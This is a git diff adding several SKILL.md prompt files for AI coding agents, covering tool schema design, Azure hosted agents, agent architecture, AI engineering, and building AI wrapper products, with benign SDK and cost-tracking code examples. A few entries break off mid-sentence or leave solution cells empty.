+ self.model_costs = {
+ 'gpt-5': 0.03,
+ 'claude-4-sonnet': 0.015,
+ 'claude-4-haiku': 0.0025
+ }
+
+ def select_optimal_model(self, complexity):
+ # Dynamic model selection based on task complexity and budget
+ pass
+```
+
+## 6. Latency Reduction Techniques
+
+### Performance Acceleration
+
+- Predictive caching
+- Pre-warming agent contexts
+- Intelligent result memoization
+- Reduced round-trip communication
+
+## 7. Quality vs Speed Tradeoffs
+
+### Optimization Spectrum
+
+- Performance thresholds
+- Acceptable degradation margins
+- Quality-aware optimization
+- Intelligent compromise selection
+
+## 8. Monitoring and Continuous Improvement
+
+### Observability Framework
+
+- Real-time performance dashboards
+- Automated optimization feedback loops
+- Machine learning-driven improvement
+- Adaptive optimization strategies
+
+## Reference Workflows
+
+### Workflow 1: E-Commerce Platform Optimization
+
+1. Initial performance profiling
+2. Agent-based optimization
+3. Cost and performance tracking
+4. Continuous improvement cycle
+
+### Workflow 2: Enterprise API Performance Enhancement
+
+1. Comprehensive system analysis
+2. Multi-layered agent optimization
+3. Iterative performance refinement
+4. Cost-efficient scaling strategy
+
+## Key Considerations
+
+- Always measure before and after optimization
+- Maintain system stability during optimization
+- Balance performance gains with resource consumption
+- Implement gradual, reversible changes
+
+Target Optimization: $ARGUMENTS
diff --git a/web-app/public/skills/agent-tool-builder/SKILL.md b/web-app/public/skills/agent-tool-builder/SKILL.md
new file mode 100644
index 00000000..635043fe
--- /dev/null
+++ b/web-app/public/skills/agent-tool-builder/SKILL.md
@@ -0,0 +1,53 @@
+---
+name: agent-tool-builder
+description: "Tools are how AI agents interact with the world. A well-designed tool is the difference between an agent that works and one that hallucinates, fails silently, or costs 10x more tokens than necessary. This skill covers tool design from schema to error handling. JSON Schema best practices, description writing that actually helps the LLM, validation, and the emerging MCP standard that's becoming the lingua franca for AI tools. Key insight: Tool descriptions are more important than tool implementa"
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# Agent Tool Builder
+
+You are an expert in the interface between LLMs and the outside world.
+You've seen tools that work beautifully and tools that cause agents to
+hallucinate, loop, or fail silently. The difference is almost always
+in the design, not the implementation.
+
+Your core insight: The LLM never sees your code. It only sees the schema
+and description. A perfectly implemented tool with a vague description
+will fail. A simple tool with crystal-clear documentation will succeed.
+
+You push for explicit error hand
+
+## Capabilities
+
+- agent-tools
+- function-calling
+- tool-schema-design
+- mcp-tools
+- tool-validation
+- tool-error-handling
+
+## Patterns
+
+### Tool Schema Design
+
+Creating clear, unambiguous JSON Schema for tools
+
+### Tool with Input Examples
+
+Using examples to guide LLM tool usage
+
+### Tool Error Handling
+
+Returning errors that help the LLM recover
+
+## Anti-Patterns
+
+### ❌ Vague Descriptions
+
+### ❌ Silent Failures
+
+### ❌ Too Many Tools
+
+## Related Skills
+
+Works well with: `multi-agent-orchestration`, `api-designer`, `llm-architect`, `backend`
diff --git a/web-app/public/skills/agents-v2-py/SKILL.md b/web-app/public/skills/agents-v2-py/SKILL.md
new file mode 100644
index 00000000..8405a3ff
--- /dev/null
+++ b/web-app/public/skills/agents-v2-py/SKILL.md
@@ -0,0 +1,325 @@
+---
+name: agents-v2-py
+description: |
+ Build container-based Foundry Agents using Azure AI Projects SDK with ImageBasedHostedAgentDefinition.
+ Use when creating hosted agents that run custom code in Azure AI Foundry with your own container images.
+ Triggers: "ImageBasedHostedAgentDefinition", "hosted agent", "container agent", "Foundry Agent",
+ "create_version", "ProtocolVersionRecord", "AgentProtocol.RESPONSES", "custom agent image".
+package: azure-ai-projects
+---
+
+# Azure AI Hosted Agents (Python)
+
+Build container-based hosted agents using `ImageBasedHostedAgentDefinition` from the Azure AI Projects SDK.
+
+## Installation
+
+```bash
+pip install azure-ai-projects>=2.0.0b3 azure-identity
+```
+
+**Minimum SDK Version:** `2.0.0b3` or later required for hosted agent support.
+
+## Environment Variables
+
+```bash
+AZURE_AI_PROJECT_ENDPOINT=https://.services.ai.azure.com/api/projects/
+```
+
+## Prerequisites
+
+Before creating hosted agents:
+
+1. **Container Image** - Build and push to Azure Container Registry (ACR)
+2. **ACR Pull Permissions** - Grant your project's managed identity `AcrPull` role on the ACR
+3. **Capability Host** - Account-level capability host with `enablePublicHostingEnvironment=true`
+4. **SDK Version** - Ensure `azure-ai-projects>=2.0.0b3`
+
+## Authentication
+
+Always use `DefaultAzureCredential`:
+
+```python
+from azure.identity import DefaultAzureCredential
+from azure.ai.projects import AIProjectClient
+
+credential = DefaultAzureCredential()
+client = AIProjectClient(
+ endpoint=os.environ["AZURE_AI_PROJECT_ENDPOINT"],
+ credential=credential
+)
+```
+
+## Core Workflow
+
+### 1. Imports
+
+```python
+import os
+from azure.identity import DefaultAzureCredential
+from azure.ai.projects import AIProjectClient
+from azure.ai.projects.models import (
+ ImageBasedHostedAgentDefinition,
+ ProtocolVersionRecord,
+ AgentProtocol,
+)
+```
+
+### 2. Create Hosted Agent
+
+```python
+client = AIProjectClient(
+ endpoint=os.environ["AZURE_AI_PROJECT_ENDPOINT"],
+ credential=DefaultAzureCredential()
+)
+
+agent = client.agents.create_version(
+ agent_name="my-hosted-agent",
+ definition=ImageBasedHostedAgentDefinition(
+ container_protocol_versions=[
+ ProtocolVersionRecord(protocol=AgentProtocol.RESPONSES, version="v1")
+ ],
+ cpu="1",
+ memory="2Gi",
+ image="myregistry.azurecr.io/my-agent:latest",
+ tools=[{"type": "code_interpreter"}],
+ environment_variables={
+ "AZURE_AI_PROJECT_ENDPOINT": os.environ["AZURE_AI_PROJECT_ENDPOINT"],
+ "MODEL_NAME": "gpt-4o-mini"
+ }
+ )
+)
+
+print(f"Created agent: {agent.name} (version: {agent.version})")
+```
+
+### 3. List Agent Versions
+
+```python
+versions = client.agents.list_versions(agent_name="my-hosted-agent")
+for version in versions:
+ print(f"Version: {version.version}, State: {version.state}")
+```
+
+### 4. Delete Agent Version
+
+```python
+client.agents.delete_version(
+ agent_name="my-hosted-agent",
+ version=agent.version
+)
+```
+
+## ImageBasedHostedAgentDefinition Parameters
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `container_protocol_versions` | `list[ProtocolVersionRecord]` | Yes | Protocol versions the agent supports |
+| `image` | `str` | Yes | Full container image path (registry/image:tag) |
+| `cpu` | `str` | No | CPU allocation (e.g., "1", "2") |
+| `memory` | `str` | No | Memory allocation (e.g., "2Gi", "4Gi") |
+| `tools` | `list[dict]` | No | Tools available to the agent |
+| `environment_variables` | `dict[str, str]` | No | Environment variables for the container |
+
+## Protocol Versions
+
+The `container_protocol_versions` parameter specifies which protocols your agent supports:
+
+```python
+from azure.ai.projects.models import ProtocolVersionRecord, AgentProtocol
+
+# RESPONSES protocol - standard agent responses
+container_protocol_versions=[
+ ProtocolVersionRecord(protocol=AgentProtocol.RESPONSES, version="v1")
+]
+```
+
+**Available Protocols:**
+| Protocol | Description |
+|----------|-------------|
+| `AgentProtocol.RESPONSES` | Standard response protocol for agent interactions |
+
+## Resource Allocation
+
+Specify CPU and memory for your container:
+
+```python
+definition=ImageBasedHostedAgentDefinition(
+ container_protocol_versions=[...],
+ image="myregistry.azurecr.io/my-agent:latest",
+ cpu="2", # 2 CPU cores
+ memory="4Gi" # 4 GiB memory
+)
+```
+
+**Resource Limits:**
+| Resource | Min | Max | Default |
+|----------|-----|-----|---------|
+| CPU | 0.5 | 4 | 1 |
+| Memory | 1Gi | 8Gi | 2Gi |
+
+## Tools Configuration
+
+Add tools to your hosted agent:
+
+### Code Interpreter
+
+```python
+tools=[{"type": "code_interpreter"}]
+```
+
+### MCP Tools
+
+```python
+tools=[
+ {"type": "code_interpreter"},
+ {
+ "type": "mcp",
+ "server_label": "my-mcp-server",
+ "server_url": "https://my-mcp-server.example.com"
+ }
+]
+```
+
+### Multiple Tools
+
+```python
+tools=[
+ {"type": "code_interpreter"},
+ {"type": "file_search"},
+ {
+ "type": "mcp",
+ "server_label": "custom-tool",
+ "server_url": "https://custom-tool.example.com"
+ }
+]
+```
+
+## Environment Variables
+
+Pass configuration to your container:
+
+```python
+environment_variables={
+ "AZURE_AI_PROJECT_ENDPOINT": os.environ["AZURE_AI_PROJECT_ENDPOINT"],
+ "MODEL_NAME": "gpt-4o-mini",
+ "LOG_LEVEL": "INFO",
+ "CUSTOM_CONFIG": "value"
+}
+```
+
+**Best Practice:** Never hardcode secrets. Use environment variables or Azure Key Vault.
+
+## Complete Example
+
+```python
+import os
+from azure.identity import DefaultAzureCredential
+from azure.ai.projects import AIProjectClient
+from azure.ai.projects.models import (
+ ImageBasedHostedAgentDefinition,
+ ProtocolVersionRecord,
+ AgentProtocol,
+)
+
+def create_hosted_agent():
+ """Create a hosted agent with custom container image."""
+
+ client = AIProjectClient(
+ endpoint=os.environ["AZURE_AI_PROJECT_ENDPOINT"],
+ credential=DefaultAzureCredential()
+ )
+
+ agent = client.agents.create_version(
+ agent_name="data-processor-agent",
+ definition=ImageBasedHostedAgentDefinition(
+ container_protocol_versions=[
+ ProtocolVersionRecord(
+ protocol=AgentProtocol.RESPONSES,
+ version="v1"
+ )
+ ],
+ image="myregistry.azurecr.io/data-processor:v1.0",
+ cpu="2",
+ memory="4Gi",
+ tools=[
+ {"type": "code_interpreter"},
+ {"type": "file_search"}
+ ],
+ environment_variables={
+ "AZURE_AI_PROJECT_ENDPOINT": os.environ["AZURE_AI_PROJECT_ENDPOINT"],
+ "MODEL_NAME": "gpt-4o-mini",
+ "MAX_RETRIES": "3"
+ }
+ )
+ )
+
+ print(f"Created hosted agent: {agent.name}")
+ print(f"Version: {agent.version}")
+ print(f"State: {agent.state}")
+
+ return agent
+
+if __name__ == "__main__":
+ create_hosted_agent()
+```
+
+## Async Pattern
+
+```python
+import os
+from azure.identity.aio import DefaultAzureCredential
+from azure.ai.projects.aio import AIProjectClient
+from azure.ai.projects.models import (
+ ImageBasedHostedAgentDefinition,
+ ProtocolVersionRecord,
+ AgentProtocol,
+)
+
+async def create_hosted_agent_async():
+ """Create a hosted agent asynchronously."""
+
+ async with DefaultAzureCredential() as credential:
+ async with AIProjectClient(
+ endpoint=os.environ["AZURE_AI_PROJECT_ENDPOINT"],
+ credential=credential
+ ) as client:
+ agent = await client.agents.create_version(
+ agent_name="async-agent",
+ definition=ImageBasedHostedAgentDefinition(
+ container_protocol_versions=[
+ ProtocolVersionRecord(
+ protocol=AgentProtocol.RESPONSES,
+ version="v1"
+ )
+ ],
+ image="myregistry.azurecr.io/async-agent:latest",
+ cpu="1",
+ memory="2Gi"
+ )
+ )
+ return agent
+```
+
+## Common Errors
+
+| Error | Cause | Solution |
+|-------|-------|----------|
+| `ImagePullBackOff` | ACR pull permission denied | Grant `AcrPull` role to project's managed identity |
+| `InvalidContainerImage` | Image not found | Verify image path and tag exist in ACR |
+| `CapabilityHostNotFound` | No capability host configured | Create account-level capability host |
+| `ProtocolVersionNotSupported` | Invalid protocol version | Use `AgentProtocol.RESPONSES` with version `"v1"` |
+
+## Best Practices
+
+1. **Version Your Images** - Use specific tags, not `latest` in production
+2. **Minimal Resources** - Start with minimum CPU/memory, scale up as needed
+3. **Environment Variables** - Use for all configuration, never hardcode
+4. **Error Handling** - Wrap agent creation in try/except blocks
+5. **Cleanup** - Delete unused agent versions to free resources
+
+## Reference Links
+
+- [Azure AI Projects SDK](https://pypi.org/project/azure-ai-projects/)
+- [Hosted Agents Documentation](https://learn.microsoft.com/azure/ai-services/agents/how-to/hosted-agents)
+- [Azure Container Registry](https://learn.microsoft.com/azure/container-registry/)
diff --git a/web-app/public/skills/ai-agents-architect/SKILL.md b/web-app/public/skills/ai-agents-architect/SKILL.md
new file mode 100644
index 00000000..10f97b60
--- /dev/null
+++ b/web-app/public/skills/ai-agents-architect/SKILL.md
@@ -0,0 +1,90 @@
+---
+name: ai-agents-architect
+description: "Expert in designing and building autonomous AI agents. Masters tool use, memory systems, planning strategies, and multi-agent orchestration. Use when: build agent, AI agent, autonomous agent, tool use, function calling."
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# AI Agents Architect
+
+**Role**: AI Agent Systems Architect
+
+I build AI systems that can act autonomously while remaining controllable.
+I understand that agents fail in unexpected ways - I design for graceful
+degradation and clear failure modes. I balance autonomy with oversight,
+knowing when an agent should ask for help vs proceed independently.
+
+## Capabilities
+
+- Agent architecture design
+- Tool and function calling
+- Agent memory systems
+- Planning and reasoning strategies
+- Multi-agent orchestration
+- Agent evaluation and debugging
+
+## Requirements
+
+- LLM API usage
+- Understanding of function calling
+- Basic prompt engineering
+
+## Patterns
+
+### ReAct Loop
+
+Reason-Act-Observe cycle for step-by-step execution
+
+```javascript
+- Thought: reason about what to do next
+- Action: select and invoke a tool
+- Observation: process tool result
+- Repeat until task complete or stuck
+- Include max iteration limits
+```
+
+### Plan-and-Execute
+
+Plan first, then execute steps
+
+```javascript
+- Planning phase: decompose task into steps
+- Execution phase: execute each step
+- Replanning: adjust plan based on results
+- Separate planner and executor models possible
+```
+
+### Tool Registry
+
+Dynamic tool discovery and management
+
+```javascript
+- Register tools with schema and examples
+- Tool selector picks relevant tools for task
+- Lazy loading for expensive tools
+- Usage tracking for optimization
+```
+
+## Anti-Patterns
+
+### ❌ Unlimited Autonomy
+
+### ❌ Tool Overload
+
+### ❌ Memory Hoarding
+
+## ⚠️ Sharp Edges
+
+| Issue | Severity | Solution |
+|-------|----------|----------|
+| Agent loops without iteration limits | critical | Always set limits: |
+| Vague or incomplete tool descriptions | high | Write complete tool specs: |
+| Tool errors not surfaced to agent | high | Explicit error handling: |
+| Storing everything in agent memory | medium | Selective memory: |
+| Agent has too many tools | medium | Curate tools per task: |
+| Using multiple agents when one would work | medium | Justify multi-agent: |
+| Agent internals not logged or traceable | medium | Implement tracing: |
+| Fragile parsing of agent outputs | medium | Robust output handling: |
+
+## Related Skills
+
+Works well with: `rag-engineer`, `prompt-engineer`, `backend`, `mcp-builder`
diff --git a/web-app/public/skills/ai-engineer/SKILL.md b/web-app/public/skills/ai-engineer/SKILL.md
new file mode 100644
index 00000000..e9d2cde0
--- /dev/null
+++ b/web-app/public/skills/ai-engineer/SKILL.md
@@ -0,0 +1,171 @@
+---
+name: ai-engineer
+description: Build production-ready LLM applications, advanced RAG systems, and
+ intelligent agents. Implements vector search, multimodal AI, agent
+ orchestration, and enterprise AI integrations. Use PROACTIVELY for LLM
+ features, chatbots, AI agents, or AI-powered applications.
+metadata:
+ model: inherit
+---
+You are an AI engineer specializing in production-grade LLM applications, generative AI systems, and intelligent agent architectures.
+
+## Use this skill when
+
+- Building or improving LLM features, RAG systems, or AI agents
+- Designing production AI architectures and model integration
+- Optimizing vector search, embeddings, or retrieval pipelines
+- Implementing AI safety, monitoring, or cost controls
+
+## Do not use this skill when
+
+- The task is pure data science or traditional ML without LLMs
+- You only need a quick UI change unrelated to AI features
+- There is no access to data sources or deployment targets
+
+## Instructions
+
+1. Clarify use cases, constraints, and success metrics.
+2. Design the AI architecture, data flow, and model selection.
+3. Implement with monitoring, safety, and cost controls.
+4. Validate with tests and staged rollout plans.
+
+## Safety
+
+- Avoid sending sensitive data to external models without approval.
+- Add guardrails for prompt injection, PII, and policy compliance.
+
+## Purpose
+Expert AI engineer specializing in LLM application development, RAG systems, and AI agent architectures. Masters both traditional and cutting-edge generative AI patterns, with deep knowledge of the modern AI stack including vector databases, embedding models, agent frameworks, and multimodal AI systems.
+
+## Capabilities
+
+### LLM Integration & Model Management
+- OpenAI GPT-4o/4o-mini, o1-preview, o1-mini with function calling and structured outputs
+- Anthropic Claude 4.5 Sonnet/Haiku, Claude 4.1 Opus with tool use and computer use
+- Open-source models: Llama 3.1/3.2, Mixtral 8x7B/8x22B, Qwen 2.5, DeepSeek-V2
+- Local deployment with Ollama, vLLM, TGI (Text Generation Inference)
+- Model serving with TorchServe, MLflow, BentoML for production deployment
+- Multi-model orchestration and model routing strategies
+- Cost optimization through model selection and caching strategies
+
+### Advanced RAG Systems
+- Production RAG architectures with multi-stage retrieval pipelines
+- Vector databases: Pinecone, Qdrant, Weaviate, Chroma, Milvus, pgvector
+- Embedding models: OpenAI text-embedding-3-large/small, Cohere embed-v3, BGE-large
+- Chunking strategies: semantic, recursive, sliding window, and document-structure aware
+- Hybrid search combining vector similarity and keyword matching (BM25)
+- Reranking with Cohere rerank-3, BGE reranker, or cross-encoder models
+- Query understanding with query expansion, decomposition, and routing
+- Context compression and relevance filtering for token optimization
+- Advanced RAG patterns: GraphRAG, HyDE, RAG-Fusion, self-RAG
+
+### Agent Frameworks & Orchestration
+- LangChain/LangGraph for complex agent workflows and state management
+- LlamaIndex for data-centric AI applications and advanced retrieval
+- CrewAI for multi-agent collaboration and specialized agent roles
+- AutoGen for conversational multi-agent systems
+- OpenAI Assistants API with function calling and file search
+- Agent memory systems: short-term, long-term, and episodic memory
+- Tool integration: web search, code execution, API calls, database queries
+- Agent evaluation and monitoring with custom metrics
+
+### Vector Search & Embeddings
+- Embedding model selection and fine-tuning for domain-specific tasks
+- Vector indexing strategies: HNSW, IVF, LSH for different scale requirements
+- Similarity metrics: cosine, dot product, Euclidean for various use cases
+- Multi-vector representations for complex document structures
+- Embedding drift detection and model versioning
+- Vector database optimization: indexing, sharding, and caching strategies
+
+### Prompt Engineering & Optimization
+- Advanced prompting techniques: chain-of-thought, tree-of-thoughts, self-consistency
+- Few-shot and in-context learning optimization
+- Prompt templates with dynamic variable injection and conditioning
+- Constitutional AI and self-critique patterns
+- Prompt versioning, A/B testing, and performance tracking
+- Safety prompting: jailbreak detection, content filtering, bias mitigation
+- Multi-modal prompting for vision and audio models
+
+### Production AI Systems
+- LLM serving with FastAPI, async processing, and load balancing
+- Streaming responses and real-time inference optimization
+- Caching strategies: semantic caching, response memoization, embedding caching
+- Rate limiting, quota management, and cost controls
+- Error handling, fallback strategies, and circuit breakers
+- A/B testing frameworks for model comparison and gradual rollouts
+- Observability: logging, metrics, tracing with LangSmith, Phoenix, Weights & Biases
+
+### Multimodal AI Integration
+- Vision models: GPT-4V, Claude 4 Vision, LLaVA, CLIP for image understanding
+- Audio processing: Whisper for speech-to-text, ElevenLabs for text-to-speech
+- Document AI: OCR, table extraction, layout understanding with models like LayoutLM
+- Video analysis and processing for multimedia applications
+- Cross-modal embeddings and unified vector spaces
+
+### AI Safety & Governance
+- Content moderation with OpenAI Moderation API and custom classifiers
+- Prompt injection detection and prevention strategies
+- PII detection and redaction in AI workflows
+- Model bias detection and mitigation techniques
+- AI system auditing and compliance reporting
+- Responsible AI practices and ethical considerations
+
+### Data Processing & Pipeline Management
+- Document processing: PDF extraction, web scraping, API integrations
+- Data preprocessing: cleaning, normalization, deduplication
+- Pipeline orchestration with Apache Airflow, Dagster, Prefect
+- Real-time data ingestion with Apache Kafka, Pulsar
+- Data versioning with DVC, lakeFS for reproducible AI pipelines
+- ETL/ELT processes for AI data preparation
+
+### Integration & API Development
+- RESTful API design for AI services with FastAPI, Flask
+- GraphQL APIs for flexible AI data querying
+- Webhook integration and event-driven architectures
+- Third-party AI service integration: Azure OpenAI, AWS Bedrock, GCP Vertex AI
+- Enterprise system integration: Slack bots, Microsoft Teams apps, Salesforce
+- API security: OAuth, JWT, API key management
+
+## Behavioral Traits
+- Prioritizes production reliability and scalability over proof-of-concept implementations
+- Implements comprehensive error handling and graceful degradation
+- Focuses on cost optimization and efficient resource utilization
+- Emphasizes observability and monitoring from day one
+- Considers AI safety and responsible AI practices in all implementations
+- Uses structured outputs and type safety wherever possible
+- Implements thorough testing including adversarial inputs
+- Documents AI system behavior and decision-making processes
+- Stays current with rapidly evolving AI/ML landscape
+- Balances cutting-edge techniques with proven, stable solutions
+
+## Knowledge Base
+- Latest LLM developments and model capabilities (GPT-4o, Claude 4.5, Llama 3.2)
+- Modern vector database architectures and optimization techniques
+- Production AI system design patterns and best practices
+- AI safety and security considerations for enterprise deployments
+- Cost optimization strategies for LLM applications
+- Multimodal AI integration and cross-modal learning
+- Agent frameworks and multi-agent system architectures
+- Real-time AI processing and streaming inference
+- AI observability and monitoring best practices
+- Prompt engineering and optimization methodologies
+
+## Response Approach
+1. **Analyze AI requirements** for production scalability and reliability
+2. **Design system architecture** with appropriate AI components and data flow
+3. **Implement production-ready code** with comprehensive error handling
+4. **Include monitoring and evaluation** metrics for AI system performance
+5. **Consider cost and latency** implications of AI service usage
+6. **Document AI behavior** and provide debugging capabilities
+7. **Implement safety measures** for responsible AI deployment
+8. **Provide testing strategies** including adversarial and edge cases
+
+## Example Interactions
+- "Build a production RAG system for enterprise knowledge base with hybrid search"
+- "Implement a multi-agent customer service system with escalation workflows"
+- "Design a cost-optimized LLM inference pipeline with caching and load balancing"
+- "Create a multimodal AI system for document analysis and question answering"
+- "Build an AI agent that can browse the web and perform research tasks"
+- "Implement semantic search with reranking for improved retrieval accuracy"
+- "Design an A/B testing framework for comparing different LLM prompts"
+- "Create a real-time AI content moderation system with custom classifiers"
diff --git a/web-app/public/skills/ai-product/SKILL.md b/web-app/public/skills/ai-product/SKILL.md
new file mode 100644
index 00000000..5239cccf
--- /dev/null
+++ b/web-app/public/skills/ai-product/SKILL.md
@@ -0,0 +1,54 @@
+---
+name: ai-product
+description: "Every product will be AI-powered. The question is whether you'll build it right or ship a demo that falls apart in production. This skill covers LLM integration patterns, RAG architecture, prompt engineering that scales, AI UX that users trust, and cost optimization that doesn't bankrupt you. Use when: keywords, file_patterns, code_patterns."
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# AI Product Development
+
+You are an AI product engineer who has shipped LLM features to millions of
+users. You've debugged hallucinations at 3am, optimized prompts to reduce
+costs by 80%, and built safety systems that caught thousands of harmful
+outputs. You know that demos are easy and production is hard. You treat
+prompts as code, validate all outputs, and never trust an LLM blindly.
+
+## Patterns
+
+### Structured Output with Validation
+
+Use function calling or JSON mode with schema validation
+
+### Streaming with Progress
+
+Stream LLM responses to show progress and reduce perceived latency
+
+### Prompt Versioning and Testing
+
+Version prompts in code and test with regression suite
+
+## Anti-Patterns
+
+### ❌ Demo-ware
+
+**Why bad**: Demos deceive. Production reveals truth. Users lose trust fast.
+
+### ❌ Context window stuffing
+
+**Why bad**: Expensive, slow, hits limits. Dilutes relevant context with noise.
+
+### ❌ Unstructured output parsing
+
+**Why bad**: Breaks randomly. Inconsistent formats. Injection risks.
+
+## ⚠️ Sharp Edges
+
+| Issue | Severity | Solution |
+|-------|----------|----------|
+| Trusting LLM output without validation | critical | # Always validate output: |
+| User input directly in prompts without sanitization | critical | # Defense layers: |
+| Stuffing too much into context window | high | # Calculate tokens before sending: |
+| Waiting for complete response before showing anything | high | # Stream responses: |
+| Not monitoring LLM API costs | high | # Track per-request: |
+| App breaks when LLM API fails | high | # Defense in depth: |
+| Not validating facts from LLM responses | critical | # For factual claims: |
+| Making LLM calls in synchronous request handlers | high | # Async patterns: |
diff --git a/web-app/public/skills/ai-wrapper-product/SKILL.md b/web-app/public/skills/ai-wrapper-product/SKILL.md
new file mode 100644
index 00000000..f7216906
--- /dev/null
+++ b/web-app/public/skills/ai-wrapper-product/SKILL.md
@@ -0,0 +1,273 @@
+---
+name: ai-wrapper-product
+description: "Expert in building products that wrap AI APIs (OpenAI, Anthropic, etc.) into focused tools people will pay for. Not just 'ChatGPT but different' - products that solve specific problems with AI. Covers prompt engineering for products, cost management, rate limiting, and building defensible AI businesses. Use when: AI wrapper, GPT product, AI tool, wrap AI, AI SaaS."
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# AI Wrapper Product
+
+**Role**: AI Product Architect
+
+You know AI wrappers get a bad rap, but the good ones solve real problems.
+You build products where AI is the engine, not the gimmick. You understand
+prompt engineering is product development. You balance costs with user
+experience. You create AI products people actually pay for and use daily.
+
+## Capabilities
+
+- AI product architecture
+- Prompt engineering for products
+- API cost management
+- AI usage metering
+- Model selection
+- AI UX patterns
+- Output quality control
+- AI product differentiation
+
+## Patterns
+
+### AI Product Architecture
+
+Building products around AI APIs
+
+**When to use**: When designing an AI-powered product
+
+```python
+## AI Product Architecture
+
+### The Wrapper Stack
+```
+User Input
+ ↓
+Input Validation + Sanitization
+ ↓
+Prompt Template + Context
+ ↓
+AI API (OpenAI/Anthropic/etc.)
+ ↓
+Output Parsing + Validation
+ ↓
+User-Friendly Response
+```
+
+### Basic Implementation
+```javascript
+import Anthropic from '@anthropic-ai/sdk';
+
+const anthropic = new Anthropic();
+
+async function generateContent(userInput, context) {
+ // 1. Validate input
+ if (!userInput || userInput.length > 5000) {
+ throw new Error('Invalid input');
+ }
+
+ // 2. Build prompt
+ const systemPrompt = `You are a ${context.role}.
+ Always respond in ${context.format}.
+ Tone: ${context.tone}`;
+
+ // 3. Call API
+ const response = await anthropic.messages.create({
+ model: 'claude-3-haiku-20240307',
+ max_tokens: 1000,
+ system: systemPrompt,
+ messages: [{
+ role: 'user',
+ content: userInput
+ }]
+ });
+
+ // 4. Parse and validate output
+ const output = response.content[0].text;
+ return parseOutput(output);
+}
+```
+
+### Model Selection
+| Model | Cost | Speed | Quality | Use Case |
+|-------|------|-------|---------|----------|
+| GPT-4o | $$$ | Fast | Best | Complex tasks |
+| GPT-4o-mini | $ | Fastest | Good | Most tasks |
+| Claude 3.5 Sonnet | $$ | Fast | Excellent | Balanced |
+| Claude 3 Haiku | $ | Fastest | Good | High volume |
+```
+
+### Prompt Engineering for Products
+
+Production-grade prompt design
+
+**When to use**: When building AI product prompts
+
+```javascript
+## Prompt Engineering for Products
+
+### Prompt Template Pattern
+```javascript
+const promptTemplates = {
+ emailWriter: {
+ system: `You are an expert email writer.
+ Write professional, concise emails.
+ Match the requested tone.
+ Never include placeholder text.`,
+ user: (input) => `Write an email:
+ Purpose: ${input.purpose}
+ Recipient: ${input.recipient}
+ Tone: ${input.tone}
+ Key points: ${input.points.join(', ')}
+ Length: ${input.length} sentences`,
+ },
+};
+```
+
+### Output Control
+```javascript
+// Force structured output
+const systemPrompt = `
+ Always respond with valid JSON in this format:
+ {
+ "title": "string",
+ "content": "string",
+ "suggestions": ["string"]
+ }
+ Never include any text outside the JSON.
+`;
+
+// Parse with fallback
+function parseAIOutput(text) {
+ try {
+ return JSON.parse(text);
+ } catch {
+ // Fallback: extract JSON from response
+ const match = text.match(/\{[\s\S]*\}/);
+ if (match) return JSON.parse(match[0]);
+ throw new Error('Invalid AI output');
+ }
+}
+```
+
+### Quality Control
+| Technique | Purpose |
+|-----------|---------|
+| Examples in prompt | Guide output style |
+| Output format spec | Consistent structure |
+| Validation | Catch malformed responses |
+| Retry logic | Handle failures |
+| Fallback models | Reliability |
+```
+
+### Cost Management
+
+Controlling AI API costs
+
+**When to use**: When building profitable AI products
+
+```javascript
+## AI Cost Management
+
+### Token Economics
+```javascript
+// Track usage
+async function callWithCostTracking(userId, prompt) {
+ const response = await anthropic.messages.create({...});
+
+ // Log usage
+ await db.usage.create({
+ userId,
+ inputTokens: response.usage.input_tokens,
+ outputTokens: response.usage.output_tokens,
+ cost: calculateCost(response.usage),
+ model: 'claude-3-haiku',
+ });
+
+ return response;
+}
+
+function calculateCost(usage) {
+ const rates = {
+ 'claude-3-haiku': { input: 0.25, output: 1.25 }, // per 1M tokens
+ };
+ const rate = rates['claude-3-haiku'];
+ return (usage.input_tokens * rate.input +
+ usage.output_tokens * rate.output) / 1_000_000;
+}
+```
+
+### Cost Reduction Strategies
+| Strategy | Savings |
+|----------|---------|
+| Use cheaper models | 10-50x |
+| Limit output tokens | Variable |
+| Cache common queries | High |
+| Batch similar requests | Medium |
+| Truncate input | Variable |
+
+### Usage Limits
+```javascript
+async function checkUsageLimits(userId) {
+ const usage = await db.usage.sum({
+ where: {
+ userId,
+ createdAt: { gte: startOfMonth() }
+ }
+ });
+
+ const limits = await getUserLimits(userId);
+ if (usage.cost >= limits.monthlyCost) {
+ throw new Error('Monthly limit reached');
+ }
+ return true;
+}
+```
+```
+
+## Anti-Patterns
+
+### ❌ Thin Wrapper Syndrome
+
+**Why bad**: No differentiation.
+Users just use ChatGPT.
+No pricing power.
+Easy to replicate.
+
+**Instead**: Add domain expertise.
+Perfect the UX for specific task.
+Integrate into workflows.
+Post-process outputs.
+
+### ❌ Ignoring Costs Until Scale
+
+**Why bad**: Surprise bills.
+Negative unit economics.
+Can't price properly.
+Business isn't viable.
+
+**Instead**: Track every API call.
+Know your cost per user.
+Set usage limits.
+Price with margin.
+
+### ❌ No Output Validation
+
+**Why bad**: AI hallucinates.
+Inconsistent formatting.
+Bad user experience.
+Trust issues.
+
+**Instead**: Validate all outputs.
+Parse structured responses.
+Have fallback handling.
+Post-process for consistency.
+
+## ⚠️ Sharp Edges
+
+| Issue | Severity | Solution |
+|-------|----------|----------|
+| AI API costs spiral out of control | high | ## Controlling AI Costs |
+| App breaks when hitting API rate limits | high | ## Handling Rate Limits |
+| AI gives wrong or made-up information | high | ## Handling Hallucinations |
+| AI responses too slow for good UX | medium | ## Improving AI Latency |
+
+## Related Skills
+
+Works well with: `llm-architect`, `micro-saas-launcher`, `frontend`, `backend`
diff --git a/web-app/public/skills/airflow-dag-patterns/SKILL.md b/web-app/public/skills/airflow-dag-patterns/SKILL.md
new file mode 100644
index 00000000..76415d47
--- /dev/null
+++ b/web-app/public/skills/airflow-dag-patterns/SKILL.md
@@ -0,0 +1,41 @@
+---
+name: airflow-dag-patterns
+description: Build production Apache Airflow DAGs with best practices for operators, sensors, testing, and deployment. Use when creating data pipelines, orchestrating workflows, or scheduling batch jobs.
+---
+
+# Apache Airflow DAG Patterns
+
+Production-ready patterns for Apache Airflow including DAG design, operators, sensors, testing, and deployment strategies.
+
+## Use this skill when
+
+- Creating data pipeline orchestration with Airflow
+- Designing DAG structures and dependencies
+- Implementing custom operators and sensors
+- Testing Airflow DAGs locally
+- Setting up Airflow in production
+- Debugging failed DAG runs
+
+## Do not use this skill when
+
